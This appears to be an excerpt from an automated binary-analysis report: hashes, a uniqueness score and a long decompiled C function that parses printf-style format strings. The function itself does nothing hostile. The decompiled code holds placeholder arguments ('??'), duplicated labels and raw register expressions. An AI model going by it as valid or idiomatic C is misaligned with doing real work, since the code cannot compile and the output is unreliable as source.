Opcode ID: 3e9d03e6f6ccb383419928575ddbaac21a39c90a748c5aa50e2fb17525cca3e2
Instruction ID: f9fac748510d4f8f7ac9096365022fa8707e23638cddede5a8976044ee339cb2
Opcode Fuzzy Hash: 3e9d03e6f6ccb383419928575ddbaac21a39c90a748c5aa50e2fb17525cca3e2
Instruction Fuzzy Hash: 5C517F38A002189FCF64DF69C844F9A7BA5AF4431CF18809FE9155B391D73ADD21CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00428CE9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 319
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00428CE9(void* __edi) {
				void* _t456;
				char* _t457;
				signed char _t467;
				char* _t471;
				char* _t472;
				signed int _t476;
				void* _t481;
				char* _t482;
				signed int _t483;
				signed int _t484;
				signed char* _t485;
				signed char* _t486;
				signed int _t488;
				char* _t490;
				signed char _t491;
				signed int _t497;
				signed int _t503;
				signed char* _t504;
				signed char _t506;
				char* _t508;
				intOrPtr _t512;
				char* _t514;
				char* _t515;
				void* _t521;
				signed int* _t522;
				signed char* _t527;
				signed char* _t531;
				char* _t532;
				signed int _t534;
				char* _t537;
				char* _t539;
				char* _t541;
				char* _t544;
				char* _t545;
				char _t548;
				char* _t550;
				char* _t552;
				char* _t555;
				signed char _t558;
				char* _t563;
				signed int _t569;
				signed char* _t571;
				signed char _t574;
				void* _t575;
				signed char* _t576;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed char* _t580;
				signed char* _t581;
				signed char* _t582;
				signed char* _t585;
				char* _t586;
				signed int _t589;
				signed char* _t590;
				char* _t592;
				signed int _t593;
				signed char* _t594;
				char* _t595;
				signed int _t596;
				char* _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t607;
				signed int _t608;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed char* _t613;
				signed char* _t615;
				void* _t617;
				void* _t618;
				signed int _t619;
				char* _t620;
				intOrPtr _t623;
				char _t626;
				signed int _t627;
				signed int _t628;
				short* _t629;
				signed int _t630;
				signed int _t637;
				char _t639;
				char* _t641;
				char* _t642;
				signed int _t643;
				signed int _t644;
				char* _t650;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t656;
				signed char* _t657;
				signed char* _t659;
				signed int _t660;
				char* _t661;
				signed int _t662;
				char _t663;
				void* _t664;
				signed int _t665;
				void* _t666;
				char** _t668;
				char** _t670;

				while(1) {
					_t586 =  &(( *(_t666 - 0x58))[1]);
					 *(_t666 - 0x58) = _t586;
					while(1) {
						 *_t668 = "+-\' 0#";
						_t668[1] =  *_t586;
						_t537 = strchr(??, ??);
						__eflags = _t537;
						if(_t537 == 0) {
							break;
						}
						_t586 =  &(_t586[1]);
						__eflags = _t586;
					}
					 *(_t666 - 0x58) = _t586;
					_t608 =  *_t586 & 0x000000ff;
					__eflags = _t608 - 0x2a;
					if(_t608 == 0x2a) {
						 *(_t666 - 0x58) =  &(_t586[1]);
						_t539 = L00427360(_t666 - 0x58);
						__eflags = _t539;
						if(_t539 == 0) {
							L225:
							_t639 = 0xffffffff;
							 *(_t666 - 0x6c) = 0;
							 *(_t666 - 0x80) = _t666 - 0x5c;
							while(1) {
								L84:
								_t613 =  *(_t666 + 0x14);
								while(1) {
									L85:
									_t657 =  &(_t613[1]);
									 *(_t666 + 0x14) = _t657;
									_t458 =  *_t613;
									__eflags = _t458;
									if(_t458 == 0) {
										break;
									}
									__eflags = _t458 - 0x25;
									if(_t458 != 0x25) {
										E00426FE0(_t458, _t666 - 0x48);
										goto L84;
									}
									_t594 = _t657;
									__eflags =  *(_t666 - 0x6c);
									if(__eflags != 0) {
										_t476 = L004273E0(_t666 + 0x14, __eflags);
										__eflags = _t476;
										if(_t476 > 0) {
											 *(_t666 + 0x18) = ( *(_t666 - 0x80))[_t476 * 4 - 4];
										}
										_t594 =  *(_t666 + 0x14);
									}
									 *(_t666 - 0x3c) = 0xffffffff;
									 *(_t666 - 0x40) = 0xffffffff;
									 *(_t666 - 0x74) = 0;
									 *(_t666 - 0x70) = 0;
									 *((intOrPtr*)(_t666 - 0x44)) =  *((intOrPtr*)(_t666 - 0x7c));
									__eflags =  *_t594;
									 *(_t666 - 0x78) = _t666 - 0x40;
									if( *_t594 == 0) {
										L112:
										_t613 = _t594;
										continue;
									} else {
										do {
											_t615 =  &(_t594[1]);
											 *(_t666 + 0x14) = _t615;
											_t574 =  *_t594;
											_t467 = _t574 - 0x20;
											__eflags = _t467 - 0x5a;
											if(__eflags > 0) {
												L181:
												_t595 =  *(_t666 - 0x70);
												__eflags = _t595 - 4;
												if(_t595 == 4) {
													L115:
													 *(_t666 + 0x14) = _t657;
													L116:
													E00426FE0(0x25, _t666 - 0x48);
													_t613 =  *(_t666 + 0x14);
													goto L85;
												}
												_t328 = _t574 - 0x30; // -48
												__eflags = _t328 - 9;
												if(_t328 > 9) {
													goto L115;
												}
												__eflags = _t595;
												if(_t595 != 0) {
													L205:
													__eflags =  *(_t666 - 0x70) - 2;
													if( *(_t666 - 0x70) == 2) {
														 *(_t666 - 0x70) = 3;
													}
													L185:
													_t471 =  *(_t666 - 0x78);
													__eflags = _t471;
													if(_t471 == 0) {
														L110:
														_t594 = _t615;
														goto L111;
													}
													_t596 =  *_t471;
													_t575 = _t574 - 0x30;
													_t472 = 0;
													__eflags = _t596;
													if(_t596 > 0) {
														_t472 = _t596 + _t596 * 4 + _t596 + _t596 * 4;
														__eflags = _t472;
													}
													 *( *(_t666 - 0x78)) =  &(_t472[_t575]);
													_t594 = _t615;
													goto L111;
												}
												 *(_t666 - 0x70) = 1;
												goto L185;
											}
											_t458 = _t467 & 0x000000ff;
											switch( *((intOrPtr*)((_t467 & 0x000000ff) * 4 +  &M004F6020))) {
												case 0:
													__ebx =  *(__ebp - 0x70);
													__eflags = __ebx;
													if(__ebx != 0) {
														goto L110;
													}
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000040;
													__ecx = __edx;
													goto L111;
												case 1:
													goto L181;
												case 2:
													__eax =  *(__ebp - 0x70);
													__eflags = __eax;
													if(__eax != 0) {
														goto L110;
													}
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000800;
													__ecx = __edx;
													goto L111;
												case 3:
													goto L116;
												case 4:
													__eax =  *(__ebp - 0x70);
													__eflags = __eax;
													if(__eax != 0) {
														goto L110;
													}
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000001;
													__ecx = __edx;
													goto L111;
												case 5:
													__eax =  *(__ebp - 0x78);
													__eflags = __eax;
													if(__eax == 0) {
														goto L145;
													}
													__eflags =  *(__ebp - 0x70) & 0x00000005;
													if(( *(__ebp - 0x70) & 0x00000005) != 0) {
														 *(__ebp - 0x78) = 0;
														goto L145;
													}
													__eax =  *(__ebp - 0x6c);
													__eflags =  *(__ebp - 0x6c);
													if(__eflags == 0) {
														L229:
														__eax =  *(__ebp + 0x18);
														__ecx =  *(__ebp - 0x78);
														_t392 = __ebp + 0x18;
														 *_t392 =  &(( *(__ebp + 0x18))[4]);
														__eflags =  *_t392;
														__eax =  *( *(__ebp + 0x18));
														 *__ecx = __eax;
														L230:
														__eflags = __eax;
														 *(__ebp - 0x78) = 0;
														if(__eax >= 0) {
															goto L110;
														}
														__eax =  *(__ebp - 0x70);
														__eflags = __eax;
														if(__eax != 0) {
															 *(__ebp - 0x3c) = 0xffffffff;
															__ecx = __edx;
														} else {
															 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000400;
															 *(__ebp - 0x40) =  ~( *(__ebp - 0x40));
															__ecx = __edx;
															 *(__ebp - 0x78) = __eax;
														}
														goto L111;
													}
													__eax = __ebp + 0x14;
													__eax = L004273E0(__ebp + 0x14, __eflags);
													__eflags = __eax;
													if(__eax <= 0) {
														__edx =  *(__ebp + 0x14);
														goto L229;
													}
													__ecx =  *(__ebp - 0x80);
													__edx =  *(__ebp + 0x14);
													__eax =  *( *(__ebp - 0x80) + __eax * 4 - 4);
													__ecx =  *(__ebp - 0x78);
													__eax =  *__eax;
													 *__ecx = __eax;
													goto L230;
												case 6:
													__eax =  *(__ebp - 0x70);
													__eflags = __eax;
													if(__eax != 0) {
														goto L110;
													}
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000100;
													__ecx = __edx;
													goto L111;
												case 7:
													__eax =  *(__ebp - 0x70);
													__eflags = __eax;
													if(__eax != 0) {
														goto L110;
													}
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000400;
													__ecx = __edx;
													goto L111;
												case 8:
													__eflags =  *(__ebp - 0x70) - 1;
													if( *(__ebp - 0x70) <= 1) {
														__eax = __ebp - 0x3c;
														 *(__ebp - 0x3c) = 0;
														 *(__ebp - 0x70) = 2;
														__ecx = __edx;
														 *(__ebp - 0x78) = __eax;
														goto L111;
													}
													goto L145;
												case 9:
													__ecx =  *(__ebp - 0x70);
													__eflags = __ecx;
													if(__ecx == 0) {
														 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000200;
														__ecx = __edx;
														goto L111;
													}
													__eflags =  *(__ebp - 0x70) - 4;
													if( *(__ebp - 0x70) != 4) {
														goto L205;
													}
													goto L115;
												case 0xa:
													__eax =  *(__ebp - 0x44);
													__eflags = __al & 0x00000004;
													__eax =  *(__ebp + 0x18);
													if((__al & 0x00000004) == 0) {
														goto L168;
													}
													goto L164;
												case 0xb:
													 *(__ebp - 0x3c) = 0xffffffff;
													goto L162;
												case 0xc:
													__eax =  *(__ebp - 0x44);
													__eflags = __al & 0x00000004;
													__eax =  *(__ebp + 0x18);
													if((__al & 0x00000004) != 0) {
														goto L136;
													}
													goto L160;
												case 0xd:
													__eax =  *(__ebp - 0x44);
													__eflags = __al & 0x00000004;
													__eax =  *(__ebp + 0x18);
													if((__al & 0x00000004) != 0) {
														goto L134;
													}
													goto L158;
												case 0xe:
													__eax =  *(__ebp - 0x44);
													__eflags = __al & 0x00000004;
													__eax =  *(__ebp + 0x18);
													if((__al & 0x00000004) != 0) {
														goto L132;
													}
													goto L166;
												case 0xf:
													__eax = __ebp + 0x14;
													 *(__ebp + 0x14) = __ecx;
													__eax = E00426D00(__ebp + 0x14);
													__eflags = __ebx - 0x6c;
													 *(__ebp - 0x74) = __eax;
													__edx =  *(__ebp + 0x14);
													if(__ebx != 0x6c) {
														L145:
														 *(__ebp - 0x70) = 4;
														__ecx = __edx;
														goto L111;
													}
													__eflags =  *0x536a51 & 0x00000001;
													if(( *0x536a51 & 0x00000001) == 0) {
														goto L145;
													}
													__eflags = __eax - 2;
													if(__eax != 2) {
														goto L145;
													}
													 *(__ebp - 0x74) = 2;
													goto L109;
												case 0x10:
													L109:
													_t147 = __ebp - 0x44;
													 *_t147 =  *(__ebp - 0x44) | 0x00000004;
													__eflags =  *_t147;
													 *(__ebp - 0x70) = 4;
													goto L110;
												case 0x11:
													L210:
													__eax =  *(__ebp + 0x18);
													 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
													__ebx =  *( *(__ebp + 0x18));
													__eflags = __ebx;
													if(__eflags == 0) {
														__ebx = L"(null)";
													}
													__eax = wcslen(__ebx);
													__ecx = __ebp - 0x48;
													__edx = __eax;
													__eax = __ebx;
													__eax = L00427040(__ebx, __ecx, __edx, __eflags);
													__edx =  *(__ebp + 0x14);
													goto L85;
												case 0x12:
													__eflags =  *(__ebp - 0x74) - 3;
													__eax =  *(__ebp + 0x18);
													if( *(__ebp - 0x74) == 3) {
														__edx = __eax[4];
														__eax =  *__eax;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
														 *(__ebp - 0x50) = __eax;
														 *(__ebp - 0x4c) = __edx;
													} else {
														__eflags =  *(__ebp - 0x74) - 2;
														if( *(__ebp - 0x74) == 2) {
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															__eax =  *__eax;
															 *(__ebp - 0x4c) = 0;
															 *(__ebp - 0x50) = __eax;
														} else {
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															__eflags =  *(__ebp - 0x74) - 1;
															__eax =  *__eax;
															 *(__ebp - 0x4c) = 0;
															 *(__ebp - 0x50) = __eax;
															if( *(__ebp - 0x74) == 1) {
																__eax =  *(__ebp - 0x50) & 0x0000ffff;
																 *(__ebp - 0x4c) = 0;
																 *(__ebp - 0x50) =  *(__ebp - 0x50) & 0x0000ffff;
															} else {
																__eflags =  *(__ebp - 0x74) - 4;
																if( *(__ebp - 0x74) == 4) {
																	__eax =  *(__ebp - 0x50) & 0x000000ff;
																	 *(__ebp - 0x4c) = 0;
																	 *(__ebp - 0x50) =  *(__ebp - 0x50) & 0x000000ff;
																}
															}
														}
													}
													__eflags = __ebx - 0x75;
													if(__ebx == 0x75) {
														goto L141;
													} else {
														__edx =  *(__ebp - 0x50);
														__ecx =  *(__ebp - 0x4c);
														__eax = __ebp - 0x48;
														 *__esp = __ebp - 0x48;
														__eax = __ebx;
														__eax = E00428560(__ebx, __ecx,  *(__ebp - 0x50));
														__edx =  *(__ebp + 0x14);
														goto L85;
													}
												case 0x13:
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
													__eflags = __al & 0x00000004;
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
													__eax =  *(__ebp + 0x18);
													if((__al & 0x00000004) != 0) {
														L164:
														__fp0 = [tword [eax];
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[0xc]);
														__eax = __ebp - 0x48;
														[tword [esp] = [tword [eax];
														__eax = L00427FC0(__ebp - 0x48);
														__edx =  *(__ebp + 0x14);
														goto L85;
													}
													L168:
													__fp0 =  *__eax;
													 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
													__eax = __ebp - 0x48;
													[tword [esp] = __fp0;
													__eax = L00427FC0(__ebp - 0x48);
													__edx =  *(__ebp + 0x14);
													goto L85;
												case 0x14:
													__eax =  *(__ebp - 0x74);
													 *(__ebp - 0x3c) = 0xffffffff;
													__eax =  *(__ebp - 0x74) - 2;
													__eflags =  *(__ebp - 0x74) - 2 - 1;
													if(__eflags <= 0) {
														L162:
														__eax =  *(__ebp + 0x18);
														__ecx = __ebp - 0x48;
														__edx = 1;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														__eax =  *( *(__ebp + 0x18));
														 *(__ebp - 0x50) = __ax;
														__eax = __ebp - 0x50;
														__eax = L00427040(__ebp - 0x50, __ecx, 1, __eflags);
														__edx =  *(__ebp + 0x14);
														goto L85;
													}
													__eax =  *(__ebp + 0x18);
													__ecx = __ebp - 0x48;
													__edx = 1;
													 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
													__eax =  *( *(__ebp + 0x18));
													 *(__ebp - 0x50) = __al;
													__eax = __ebp - 0x50;
													__eax = L00427160(__ebp - 0x50, __ecx, 1);
													__edx =  *(__ebp + 0x14);
													goto L85;
												case 0x15:
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000080;
													__eflags =  *(__ebp - 0x74) - 3;
													__eax =  *(__ebp + 0x18);
													if( *(__ebp - 0x74) == 3) {
														__edx = __eax[4];
														__eax =  *__eax;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
														 *(__ebp - 0x50) = __eax;
														 *(__ebp - 0x4c) = __edx;
													} else {
														__eflags =  *(__ebp - 0x74) - 2;
														if( *(__ebp - 0x74) == 2) {
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															__eax =  *__eax;
															 *(__ebp - 0x50) = __eax;
															 *(__ebp - 0x4c) = __eax;
														} else {
															 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
															__eax =  *__eax;
															 *(__ebp - 0x50) = __eax;
															__eax = __eax >> 0x1f;
															__eflags =  *(__ebp - 0x74) - 1;
															 *(__ebp - 0x4c) = __eax;
															if( *(__ebp - 0x74) == 1) {
																__eax =  *(__ebp - 0x50);
																 *(__ebp - 0x50) = __eax;
																 *(__ebp - 0x4c) = __eax;
															} else {
																__eflags =  *(__ebp - 0x74) - 4;
																if( *(__ebp - 0x74) == 4) {
																	__eax =  *(__ebp - 0x50);
																	 *(__ebp - 0x50) = __eax;
																	 *(__ebp - 0x4c) = __eax;
																}
															}
														}
													}
													L141:
													__edx =  *(__ebp - 0x4c);
													__eax =  *(__ebp - 0x50);
													__ecx = __ebp - 0x48;
													__eax = L00427570( *(__ebp - 0x50), __ecx,  *(__ebp - 0x4c));
													__edx =  *(__ebp + 0x14);
													goto L85;
												case 0x16:
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
													__eflags = __al & 0x00000004;
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
													__eax =  *(__ebp + 0x18);
													if((__al & 0x00000004) == 0) {
														L160:
														__fp0 =  *__eax;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
														__eax = __ebp - 0x48;
														[tword [esp] = __fp0;
														__eax = L00427CC0(__ebp - 0x48);
														__edx =  *(__ebp + 0x14);
														goto L85;
													}
													L136:
													__fp0 = [tword [eax];
													 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[0xc]);
													__eax = __ebp - 0x48;
													[tword [esp] = [tword [eax];
													__eax = L00427CC0(__ebp - 0x48);
													__edx =  *(__ebp + 0x14);
													goto L85;
												case 0x17:
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
													__eflags = __al & 0x00000004;
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
													__eax =  *(__ebp + 0x18);
													if((__al & 0x00000004) == 0) {
														L158:
														__fp0 =  *__eax;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
														__eax = __ebp - 0x48;
														[tword [esp] = __fp0;
														__eax = L00427D70(__ebp - 0x48);
														__edx =  *(__ebp + 0x14);
														goto L85;
													}
													L134:
													__fp0 = [tword [eax];
													 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[0xc]);
													__eax = __ebp - 0x48;
													[tword [esp] = [tword [eax];
													__eax = L00427D70(__ebp - 0x48);
													__edx =  *(__ebp + 0x14);
													goto L85;
												case 0x18:
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
													__eflags = __al & 0x00000004;
													 *(__ebp - 0x44) =  *(__ebp - 0x44) | 0x00000020;
													__eax =  *(__ebp + 0x18);
													if((__al & 0x00000004) == 0) {
														L166:
														__fp0 =  *__eax;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[8]);
														__eax = __ebp - 0x48;
														[tword [esp] = __fp0;
														__eax = L00427E40(__ebp - 0x48);
														__edx =  *(__ebp + 0x14);
														goto L85;
													}
													L132:
													__fp0 = [tword [eax];
													 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[0xc]);
													__eax = __ebp - 0x48;
													[tword [esp] = [tword [eax];
													__eax = L00427E40(__ebp - 0x48);
													__edx =  *(__ebp + 0x14);
													goto L85;
												case 0x19:
													__eflags =  *(__ebp - 0x74) - 4;
													__eax =  *(__ebp + 0x18);
													if( *(__ebp - 0x74) == 4) {
														__edx =  *(__ebp - 0x30);
														__eax =  *__eax;
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														 *__eax = __dl;
														__edx =  *(__ebp + 0x14);
														goto L85;
													}
													__eflags =  *(__ebp - 0x74) - 1;
													if( *(__ebp - 0x74) == 1) {
														__eax =  *__eax;
														__ecx =  *(__ebp - 0x30);
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														 *__eax = __cx;
														goto L85;
													}
													__eflags =  *(__ebp - 0x74) - 2;
													if( *(__ebp - 0x74) == 2) {
														L130:
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														__ecx =  *(__ebp - 0x30);
														__eax =  *__eax;
														 *__eax = __ecx;
														goto L85;
													}
													__eflags =  *(__ebp - 0x74) - 3;
													if( *(__ebp - 0x74) == 3) {
														 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
														__ecx =  *(__ebp - 0x30);
														__eax =  *__eax;
														 *__eax = __ecx;
														__ecx = __ecx >> 0x1f;
														__eax[4] = __ecx;
														goto L85;
													}
													goto L130;
												case 0x1a:
													__edx =  *(__ebp - 0x70);
													__eflags =  *(__ebp - 0x70);
													if( *(__ebp - 0x70) == 0) {
														__eax =  *(__ebp - 0x7c);
														__eflags = __eax -  *(__ebp - 0x44);
														if(__eax ==  *(__ebp - 0x44)) {
															__ah = __ah | 0x00000002;
															 *(__ebp - 0x3c) = 8;
															 *(__ebp - 0x44) = __eax;
														}
													}
													__eax =  *(__ebp + 0x18);
													 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
													__eax =  *( *(__ebp + 0x18));
													 *(__ebp - 0x4c) = 0;
													__ecx =  *(__ebp - 0x4c);
													 *(__ebp - 0x50) =  *( *(__ebp + 0x18));
													__eax = __ebp - 0x48;
													__edx =  *(__ebp - 0x50);
													 *__esp = __ebp - 0x48;
													__eax = 0x78;
													__eax = E00428560(0x78, __ecx,  *(__ebp - 0x50));
													__edx =  *(__ebp + 0x14);
													goto L85;
												case 0x1b:
													 *(__ebp - 0x74) =  *(__ebp - 0x74) - 2;
													__eflags =  *(__ebp - 0x74) - 2 - 1;
													if( *(__ebp - 0x74) - 2 <= 1) {
														goto L210;
													}
													__eax =  *(__ebp + 0x18);
													 *(__ebp + 0x18) =  &(( *(__ebp + 0x18))[4]);
													__ebx =  *( *(__ebp + 0x18));
													__eflags = __ebx;
													if(__ebx == 0) {
														__edx = 6;
														__eax = "(null)";
													} else {
														__edx = strlen(__ebx);
														__eax = __ebx;
													}
													__ecx = __ebp - 0x48;
													__eax = L00427160(__eax, __ecx, __edx);
													__edx =  *(__ebp + 0x14);
													goto L85;
											}
											L111:
											__eflags =  *_t594;
										} while ( *_t594 != 0);
										goto L112;
									}
								}
								__eflags =  *(_t666 - 0x6c);
								if( *(_t666 - 0x6c) == 0) {
									L98:
									 *_t668 =  *(_t666 - 0x1c);
									free(??);
									return  *((intOrPtr*)(_t666 - 0x30));
								}
								do {
									_t639 = _t639 - 1;
									_t134 =  &(1[_t639]); // 0xffffffff
									__eflags = _t134;
								} while (_t134 > 0);
								goto L98;
							}
						}
						__eflags = _t653 - _t539;
						if(_t653 < _t539) {
							_t653 = _t539;
						}
						_t541 =  *(_t666 - 0x58);
						_t586 =  &(_t541[1]);
						 *(_t666 - 0x58) = _t586;
						_t608 = _t541[1] & 0x000000ff;
						L70:
						__eflags = _t608 - 0x2e;
						if(_t608 != 0x2e) {
							L75:
							E00426D00(_t666 - 0x58);
							_t544 =  *( *(_t666 - 0x58));
							 *(_t666 - 0x74) = _t544;
							_t668[1] = _t544;
							 *_t668 = "aAeEfFgGcCdiouxXnpsS";
							_t545 = strchr(??, ??);
							__eflags = _t545;
							_t609 =  *(_t666 - 0x74) & 0x000000ff;
							if(_t545 == 0) {
								L80:
								__eflags = _t609 - 0x25;
								if(_t609 != 0x25) {
									L16:
									_t589 = _t656;
									_t656 =  *(_t666 - 0x70);
									 *(_t666 - 0x58) = _t656;
									if( *_t589 != 0) {
										L3:
										if( *_t656 != 0x25) {
											_t571 = _t656;
											_t656 =  &(1[_t656]);
											L2:
											 *(_t666 - 0x58) = _t656;
											if( *_t571 == 0) {
												goto L18;
											}
											goto L3;
										}
										_t532 =  &(1[_t656]);
										 *(_t666 - 0x70) = _t532;
										 *(_t666 - 0x58) = _t532;
										_t534 = L00427360(_t666 - 0x58);
										_t653 = _t534;
										if(_t534 != 0) {
											continue;
										}
										_t590 =  *(_t666 - 0x58);
										_t610 =  *_t590 & 0x000000ff;
										if(_t610 == 0x24) {
											goto L225;
										} else {
											 *(_t666 - 0x74) = _t656;
											_t665 = _t610;
											L8:
											 *_t668 = "+-\' 0#";
											_t654 = _t665;
											_t668[1] = _t654;
											if(strchr(??, ??) != 0) {
												_t590 =  &(_t590[1]);
												__eflags = _t590;
												_t665 =  *_t590 & 0x000000ff;
												goto L8;
											}
											_t611 = _t665;
											_t656 =  *(_t666 - 0x74);
											if(_t611 == 0x2a) {
												_t611 = _t590[1] & 0x000000ff;
												_t590 =  &(_t590[1]);
												L12:
												if(_t611 == 0x2e) {
													_t558 = _t590[1];
													__eflags = _t558 - 0x2a;
													if(_t558 == 0x2a) {
														_t590 =  &(_t590[2]);
														goto L13;
													}
													_t590 =  &(_t590[1]);
													__eflags = _t558 - 0x30 - 9;
													if(_t558 - 0x30 > 9) {
														goto L13;
													}
													do {
														_t590 =  &(_t590[1]);
														__eflags =  *_t590 - 0x30 - 9;
													} while ( *_t590 - 0x30 <= 9);
												}
												L13:
												 *(_t666 - 0x58) = _t590;
												E00426D00(_t666 - 0x58);
												_t571 =  *(_t666 - 0x58);
												_t655 =  *_t571 & 0x000000ff;
												 *_t668 = "aAeEfFgGcCdiouxXnpsS";
												_t668[1] = _t655;
												_t563 = strchr(??, ??);
												if(_t563 == 0) {
													L15:
													if(_t655 == 0x25) {
														L79:
														_t656 =  &(_t571[1]);
														goto L2;
													}
													goto L16;
												}
												asm("cdq");
												_t612 = (_t612 & 0x00000007) + _t563 - "aAeEfFgGcCdiouxXnpsS" >> 3;
												if(_t612 != 0xffffffff) {
													goto L225;
												}
												goto L15;
											}
											_t10 = _t654 - 0x30; // -48
											_t612 = _t10;
											if(_t612 > 9) {
												goto L12;
											} else {
												goto L11;
											}
											do {
												L11:
												_t590 =  &(_t590[1]);
												_t569 =  *_t590;
												_t611 = _t569;
											} while (_t569 - 0x30 <= 9);
											goto L12;
										}
									} else {
										L18:
										_t593 =  *(_t666 - 0x6c);
										_t456 = E0041C220(0x12 + _t593 * 4 >> 4 << 4);
										_t639 = 0xffffffff;
										_t668 = _t668 - _t456;
										_t457 =  &(_t668[3]);
										 *(_t666 - 0x78) = _t457;
										 *(_t666 - 0x80) = _t457;
										if(_t593 == 0) {
											goto L84;
										} else {
											_t617 = _t593 + _t593;
											 *(_t666 - 0x88) = _t668;
											_t481 = E0041C220(_t617 + 0x10 >> 4 << 4);
											_t659 =  *(_t666 + 0x14);
											_t670 = _t668 - _t481;
											_t641 =  &(_t670[3]);
											 *(_t666 - 0x54) = _t659;
											_t482 = _t641;
											_t618 = _t617 + _t641;
											goto L20;
											L24:
											L24:
											if( *_t659 != 0x25) {
												_t576 = _t659;
												_t659 =  &(_t659[1]);
												__eflags = _t659;
											} else {
												goto L25;
											}
											L23:
											 *(_t666 - 0x54) = _t659;
											__eflags =  *_t576;
											if( *_t576 == 0) {
												L48:
												_t642 =  *(_t666 - 0x70);
												_t619 =  *(_t666 - 0x6c);
												_t483 = 0;
												while( *((short*)(_t642 + _t483 * 2)) != 0) {
													_t483 =  &(1[_t483]);
													if(_t483 < _t619) {
														continue;
													}
													_t660 =  *(_t666 - 0x6c);
													if(_t660 == 0) {
														L83:
														_t484 =  *(_t666 - 0x6c);
														_t668 =  *(_t666 - 0x88);
														_t108 = _t484 - 1; // -1
														_t639 = _t108;
														goto L84;
													}
													_t600 =  *(_t666 + 0x18);
													_t620 =  *(_t666 - 0x78);
													_t485 =  &(_t642[1]);
													_t661 =  &(_t642[1 + _t660 * 2]);
													do {
														_t577 =  *(_t485 - 1) & 0x000000ff;
														 *_t620 = _t600;
														if(_t577 != 1) {
															__eflags = _t577 - 3;
															if(_t577 == 3) {
																L189:
																_t600 =  &(_t600[4]);
																goto L57;
															}
															_t578 =  *_t485 & 0x000000ff;
															__eflags = _t578 - 2;
															if(_t578 == 2) {
																goto L189;
															}
															__eflags = _t578 - 3;
															if(_t578 != 3) {
																goto L189;
															}
															L56:
															_t600 =  &(_t600[8]);
															__eflags = _t600;
															goto L57;
														}
														_t579 =  *_t485 & 0x000000ff;
														if(_t579 == 0x4c || ( *0x536a51 & 0x00000001) != 0 && _t579 == 2) {
															_t600 =  &(_t600[0xc]);
														} else {
															goto L56;
														}
														L57:
														_t485 =  &(_t485[2]);
														_t620 =  &(_t620[4]);
													} while (_t661 != _t485);
													goto L83;
												}
												 *(_t666 - 0x6c) = 0;
												goto L83;
											}
											goto L24;
											L25:
											_t486 =  &(_t659[1]);
											 *(_t666 - 0x84) = _t486;
											 *(_t666 - 0x54) = _t486;
											_t488 = L00427360(_t666 - 0x54);
											 *(_t666 - 0x74) = _t488;
											if(_t488 <= 0) {
												_t580 =  *(_t666 - 0x54);
												 *(_t666 - 0x74) = _t659;
												while(1) {
													_t643 =  *_t580 & 0x000000ff;
													 *_t670 = "+-\' 0#";
													_t662 = _t643;
													_t670[1] = _t662;
													_t490 = strchr(??, ??);
													__eflags = _t490;
													if(_t490 == 0) {
														break;
													}
													_t580 =  &(_t580[1]);
													__eflags = _t580;
												}
												_t601 = _t643;
												_t644 = _t662;
												_t659 =  *(_t666 - 0x74);
												__eflags = _t601 - 0x2a;
												if(_t601 == 0x2a) {
													_t601 = _t580[1] & 0x000000ff;
													_t580 =  &(_t580[1]);
													L202:
													__eflags = _t601 - 0x2e;
													if(_t601 == 0x2e) {
														_t491 = _t580[1];
														__eflags = _t491 - 0x2a;
														if(_t491 == 0x2a) {
															_t580 =  &(_t580[2]);
															goto L203;
														}
														_t580 =  &(_t580[1]);
														__eflags = _t491 - 0x30 - 9;
														if(_t491 - 0x30 > 9) {
															goto L203;
														}
														do {
															_t580 =  &(_t580[1]);
															__eflags =  *_t580 - 0x30 - 9;
														} while ( *_t580 - 0x30 <= 9);
													}
													L203:
													 *(_t666 - 0x54) = _t580;
													E00426D00(_t666 - 0x54);
													_t581 =  *(_t666 - 0x54);
													__eflags =  *_t581 - 0x25;
													if( *_t581 != 0x25) {
														goto L180;
													}
